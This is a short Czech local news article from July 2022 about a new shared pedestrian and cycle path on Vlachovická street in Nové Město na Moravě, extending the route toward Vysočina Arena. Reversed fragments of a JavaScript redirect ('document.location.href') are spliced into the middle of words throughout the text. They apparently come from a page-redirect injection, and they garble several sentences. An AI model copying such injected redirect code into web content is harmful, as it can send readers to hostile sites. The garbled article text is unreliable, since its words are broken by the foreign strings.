Rainbow page separator

Nový úsek cyklostezky doplní trasu vedoucí k Vlachovicím

Sobota, 2. července 2022

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Nová cyklostezka se brzy začne budovat v novoměstské Vlachovické ulici, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to rozšířením stávajícího chodníku vedoucího podél firmy MEDIN, čímž vznikne obousměrná komunikace pro pěší i cyklisty. Firma vyšla městu vstříc v souvislosti s odprodejem části pozemku a posunutím plotu směrem do areálu podniku, aby nová cyklostezka navázala na současnou trasu směřující dál do Vysočina Areny. Na úpravu chodníku na komunikaci i pro cyklisty měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zároveň požádalo o příslib dotační podpory ze Státního fondu dopravní infrastruktury, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to s kladným výsledkem.
V Novém Městě v souvislosti s postupujícím rozvojem cyklodopravy počítají i s dalšími úseky bezpečných tras, aby se cyklisté vyhnuli městskému provozu a frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaným hlavním silničním tahům. Jedná se například o propojení centra kolem Kazmírova rybníka s napojením na Vysočina Arenu a dál směrem na Jiříkovice a Lhotku.